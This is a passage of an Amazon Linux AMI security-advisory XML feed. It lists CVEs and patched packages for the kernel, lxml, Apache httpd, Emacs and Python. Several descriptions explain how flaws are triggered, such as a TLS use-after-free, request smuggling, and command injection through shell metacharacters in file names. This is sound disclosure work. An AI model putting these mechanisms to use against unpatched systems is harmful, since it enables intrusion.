epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_mysql" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_mysql-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.53-1.37.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_authn_pam" version="1.4.53" release="1.37.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_authn_pam-1.4.53-1.37.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1706</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1706: important priority package update for kernel</title><issued date="2023-03-17 15:53:00" /><updated date="2025-04-23 22:53:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1073:
A memory corruption flaw was found in the Linux kernel's human interface device (HID) subsystem in how a user inserts a malicious USB device. This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2023-0461:
There is a use-after-free vulnerability in the Linux Kernel which can be exploited to achieve local privilege escalation. To reach the vulnerability, the kernel configuration flag CONFIG_TLS or CONFIG_XFRM_ESPINTCP has to be enabled, but the operation does not require any privilege.
There is a use-after-free bug of icsk_ulp_data of a struct inet_connection_sock.
When CONFIG_TLS is enabled, user can install a tls context (struct tls_context) on a connected tcp socket. The context is not cleared if this socket is disconnected and reused as a listener. If a new socket is created from the listener, the context is inherited and vulnerable.
The setsockopt TCP_ULP operation does not require any privilege.
We recommend upgrading past commit 2c02d41d71f90a5168391b6a5f2954112ba2307c.
CVE-2023-0459:
Detected a few exploitable gadgets that could leak secret memory through a side-channel such as MDS as well as insufficient hardening of the usercopy functions against spectre-v1.
CVE-2023-0394:
A NULL pointer dereference flaw was found in rawv6_push_pending_frames in net/ipv6/raw.c in the network subcomponent in the Linux kernel. This flaw causes the system to crash.
CVE-2023-0045:
The Linux kernel does not correctly mitigate SMT attacks, as discovered through a strange pattern in the kernel API using STIBP as a mitigation, leaving the process exposed for a short period of time after a syscall. The kernel also does not issue an IBPB immediately during the syscall.
CVE-2022-49753:
In the Linux kernel, the following vulnerability has been resolved:
dmaengine: Fix double increment of client_count in dma_chan_get()
CVE-2022-49015:
In the Linux kernel, the following vulnerability has been resolved:
net: hsr: Fix potential use-after-free
CVE-2022-48991:
In the Linux kernel, the following vulnerability has been resolved:
mm/khugepaged: invoke MMU notifiers in shmem/file collapse paths
CVE-2022-48988:
In the Linux kernel, the following vulnerability has been resolved:
memcg: fix possible use-after-free in memcg_write_event_control()
CVE-2022-48956:
In the Linux kernel, the following vulnerability has been resolved:
ipv6: avoid use-after-free in ip6_fragment()
CVE-2022-42329:
Guests can trigger deadlock in Linux netback driver. [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] The patch for XSA-392 introduced another issue which might result in a deadlock when trying to free the SKB of a packet dropped due to the XSA-392 handling (CVE-2022-42328). Additionally, when dropping packets for other reasons the same deadlock could occur in case of netpoll being active for the interface the xen-netback driver is connected to (CVE-2022-42329).
CVE-2022-42328:
Guests can trigger deadlock in Linux netback driver. [This CNA information record relates to multiple CVEs; the text explains which aspects/vulnerabilities correspond to which CVE.] The patch for XSA-392 introduced another issue which might result in a deadlock when trying to free the SKB of a packet dropped due to the XSA-392 handling (CVE-2022-42328). Additionally, when dropping packets for other reasons the same deadlock could occur in case of netpoll being active for the interface the xen-netback driver is connected to (CVE-2022-42329).
CVE-2022-3643:
Guests can trigger NIC interface reset/abort/crash via netback. It is possible for a guest to trigger a NIC interface reset/abort/crash in a Linux based network backend by sending certain kinds of packets. It appears to be an (unwritten?) assumption in the rest of the Linux network stack that packet protocol headers are all contained within the linear section of the SKB, and some NICs behave badly if this is not the case. This has been reported to occur with Cisco (enic) and Broadcom NetXtrem II BCM5780 (bnx2x), though it may be an issue with other NICs/drivers as well. In case the frontend is sending requests with split headers, netback will forward those violating the above mentioned assumption to the networking core, resulting in said misbehavior.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3643" title="" id="CVE-2022-3643" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42328" title="" id="CVE-2022-42328" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42329" title="" id="CVE-2022-42329" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48956" title="" id="CVE-2022-48956" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48988" title="" id="CVE-2022-48988" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48991" title="" id="CVE-2022-48991" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49015" title="" id="CVE-2022-49015" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-49753" title="" id="CVE-2022-49753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0045" title="" id="CVE-2023-0045" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0394" title="" id="CVE-2023-0394" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0459" title="" id="CVE-2023-0459" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0461" title="" id="CVE-2023-0461" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1073" title="" id="CVE-2023-1073" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-tools-devel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-debuginfo-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.305" release="155.531.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.305-155.531.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="perf" 
version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.305-155.531.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.305" release="155.531.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.305-155.531.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1707</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1707: important priority package update for kernel</title><issued date="2023-03-17 15:53:00" /><updated date="2024-06-07 05:16:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-26607:
In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.
CVE-2022-3524:
A vulnerability was found in Linux Kernel. It has been declared as problematic. Affected by this vulnerability is the function ipv6_renew_options of the component IPv6 Handler. The manipulation leads to memory leak. The attack can be launched remotely. It is recommended to apply a patch to fix this issue. The identifier VDB-211021 was assigned to this vulnerability.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3524" title="" id="CVE-2022-3524" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26607" title="" id="CVE-2023-26607" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perf-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.301" release="153.528.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.301-153.528.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.301" release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.301-153.528.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.301" 
release="153.528.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.301-153.528.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1709</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1709: important priority package update for python-lxml</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2021-43818:
There's a flaw in python-lxml's HTML Cleaner component, which is responsible for sanitizing HTML and Javascript. An attacker who is able to submit a crafted payload to a web service using python-lxml's HTML Cleaner may be able to trigger script execution in clients such as web browsers. This can occur because the HTML Cleaner did not remove scripts within SVG images in data URLs such as <img src=>. XSS can result in impacts to the integrity and availability of the web page, as well as a potential impact to data confidentiality in some circumstances.
CVE-2020-27783:
A Cross-site Scripting (XSS) vulnerability was found in the python-lxml's clean module. The module's parser did not properly imitate browsers, causing different behaviors between the sanitizer and the user's page. This flaw allows a remote attacker to run arbitrary HTML/JS code. The highest threat from this vulnerability is to confidentiality and integrity.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27783" title="" id="CVE-2020-27783" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-43818" title="" id="CVE-2021-43818" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-lxml-debuginfo" version="3.2.1" release="4.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-lxml-debuginfo-3.2.1-4.10.amzn1.x86_64.rpm</filename></package><package name="python26-lxml" version="3.2.1" release="4.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-lxml-3.2.1-4.10.amzn1.x86_64.rpm</filename></package><package name="python27-lxml" version="3.2.1" release="4.10.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-lxml-3.2.1-4.10.amzn1.x86_64.rpm</filename></package><package name="python26-lxml-docs" version="3.2.1" release="4.10.amzn1" epoch="0" arch="noarch"><filename>Packages/python26-lxml-docs-3.2.1-4.10.amzn1.noarch.rpm</filename></package><package name="python27-lxml-docs" version="3.2.1" release="4.10.amzn1" epoch="0" arch="noarch"><filename>Packages/python27-lxml-docs-3.2.1-4.10.amzn1.noarch.rpm</filename></package><package name="python-lxml-debuginfo" version="3.2.1" release="4.10.amzn1" epoch="0" arch="i686"><filename>Packages/python-lxml-debuginfo-3.2.1-4.10.amzn1.i686.rpm</filename></package><package name="python26-lxml" version="3.2.1" release="4.10.amzn1" epoch="0" arch="i686"><filename>Packages/python26-lxml-3.2.1-4.10.amzn1.i686.rpm</filename></package><package name="python27-lxml" version="3.2.1" release="4.10.amzn1" epoch="0" arch="i686"><filename>Packages/python27-lxml-3.2.1-4.10.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1711</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1711: 
important priority package update for httpd24</title><issued date="2023-03-17 15:53:00" /><updated date="2023-03-22 18:51:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-27522:
HTTP Response Smuggling vulnerability in Apache HTTP Server via mod_proxy_uwsgi. This issue affects Apache HTTP Server: from 2.4.30 through 2.4.55. Special characters in the origin response header can truncate/split the response forwarded to the client.
CVE-2023-25690:
Some mod_proxy configurations on Apache HTTP Server versions 2.4.0 through 2.4.55 allow an HTTP Request Smuggling attack. Configurations are affected when mod_proxy is enabled along with some form of RewriteRule or ProxyPassMatch in which a non-specific pattern matches some portion of the user-supplied request-target (URL) data and is then re-inserted into the proxied request-target using variable substitution. For example, something like: RewriteEngine on RewriteRule "^/here/(.*)" "http://example.com:8080/elsewhere?$1"; [P] ProxyPassReverse /here/ http://example.com:8080/ Request splitting/smuggling could result in bypass of access controls in the proxy server, proxying unintended URLs to existing origin servers, and cache poisoning. Users are recommended to update to at least version 2.4.56 of Apache HTTP Server.
CVE-2022-37436:
Prior to Apache HTTP Server 2.4.55, a malicious backend can cause the response headers to be truncated early, resulting in some headers being incorporated into the response body. If the later headers have any security purpose, they will not be interpreted by the client.
CVE-2022-36760:
Inconsistent Interpretation of HTTP Requests ('HTTP Request Smuggling') vulnerability in mod_proxy_ajp of Apache HTTP Server allows an attacker to smuggle requests to the AJP server it forwards requests to. This issue affects Apache HTTP Server 2.4 version 2.4.54 and prior versions.
CVE-2006-20001:
A carefully crafted If: request header can cause a memory read, or write of a single zero byte, in a pool (heap) memory location beyond the header value sent. This could cause the process to crash. This issue affects Apache HTTP Server 2.4.54 and earlier.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-20001" title="" id="CVE-2006-20001" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36760" title="" id="CVE-2022-36760" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37436" title="" id="CVE-2022-37436" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25690" title="" id="CVE-2023-25690" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27522" title="" id="CVE-2023-27522" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_session" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_session-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_ldap" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_ldap-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="httpd24" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_ssl" version="2.4.56" release="1.100.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_ssl-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="httpd24-tools" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-tools-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_proxy_html" version="2.4.56" release="1.100.amzn1" epoch="1" arch="x86_64"><filename>Packages/mod24_proxy_html-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="httpd24-devel" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-devel-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="httpd24-manual" version="2.4.56" 
release="1.100.amzn1" epoch="0" arch="noarch"><filename>Packages/httpd24-manual-2.4.56-1.100.amzn1.noarch.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/httpd24-debuginfo-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_md" version="2.4.56" release="1.100.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_md-2.4.56-1.100.amzn1.x86_64.rpm</filename></package><package name="mod24_session" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_session-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="mod24_ldap" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_ldap-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="httpd24-tools" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-tools-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="mod24_md" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_md-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="httpd24-debuginfo" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-debuginfo-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="mod24_ssl" version="2.4.56" release="1.100.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_ssl-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="mod24_proxy_html" version="2.4.56" release="1.100.amzn1" epoch="1" arch="i686"><filename>Packages/mod24_proxy_html-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="httpd24" version="2.4.56" release="1.100.amzn1" epoch="0" arch="i686"><filename>Packages/httpd24-2.4.56-1.100.amzn1.i686.rpm</filename></package><package name="httpd24-devel" version="2.4.56" release="1.100.amzn1" epoch="0" 
arch="i686"><filename>Packages/httpd24-devel-2.4.56-1.100.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1712</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1712: important priority package update for emacs</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:25:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48339:
An issue was discovered in GNU Emacs through 28.2. htmlfontify.el has a command injection vulnerability. In the hfy-istext-command function, the parameter file and parameter srcdir come from external input, and parameters are not escaped. If a file name or directory name contains shell metacharacters, code may be executed.
CVE-2022-48337:
GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the etags program. For example, a victim may use the "etags -u *" command (suggested in the etags documentation) in a situation where the current working directory has contents that depend on untrusted input.
CVE-2022-45939:
GNU Emacs through 28.2 allows attackers to execute commands via shell metacharacters in the name of a source-code file, because lib-src/etags.c uses the system C library function in its implementation of the ctags program. For example, a victim may use the "ctags *" command (suggested in the ctags documentation) in a situation where the current working directory has contents that depend on untrusted input.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45939" title="" id="CVE-2022-45939" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48337" title="" id="CVE-2022-48337" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48339" title="" id="CVE-2022-48339" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs-debuginfo" version="24.3" release="20.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-debuginfo-24.3-20.25.amzn1.x86_64.rpm</filename></package><package name="emacs" version="24.3" release="20.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-24.3-20.25.amzn1.x86_64.rpm</filename></package><package name="emacs-common" version="24.3" release="20.25.amzn1" epoch="1" arch="x86_64"><filename>Packages/emacs-common-24.3-20.25.amzn1.x86_64.rpm</filename></package><package name="emacs-el" version="24.3" release="20.25.amzn1" epoch="1" arch="noarch"><filename>Packages/emacs-el-24.3-20.25.amzn1.noarch.rpm</filename></package><package name="emacs" version="24.3" release="20.25.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-24.3-20.25.amzn1.i686.rpm</filename></package><package name="emacs-common" version="24.3" release="20.25.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-common-24.3-20.25.amzn1.i686.rpm</filename></package><package name="emacs-debuginfo" version="24.3" release="20.25.amzn1" epoch="1" arch="i686"><filename>Packages/emacs-debuginfo-24.3-20.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1713</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1713: important priority package update for python27</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:24:00" 
/><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24329:
An issue in the urllib.parse component of Python before v3.11 allows attackers to bypass blocklisting methods by supplying a URL that starts with blank characters.
CVE-2022-45061:
An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45061" title="" id="CVE-2022-45061" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-24329" title="" id="CVE-2023-24329" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-libs" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.18" release="2.145.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.18-2.145.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.18" 
release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.18-2.145.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.18" release="2.145.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.18-2.145.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1714</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1714: important priority package update for python38</title><issued date="2023-03-30 22:50:00" /><updated date="2023-04-05 20:24:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-24329:
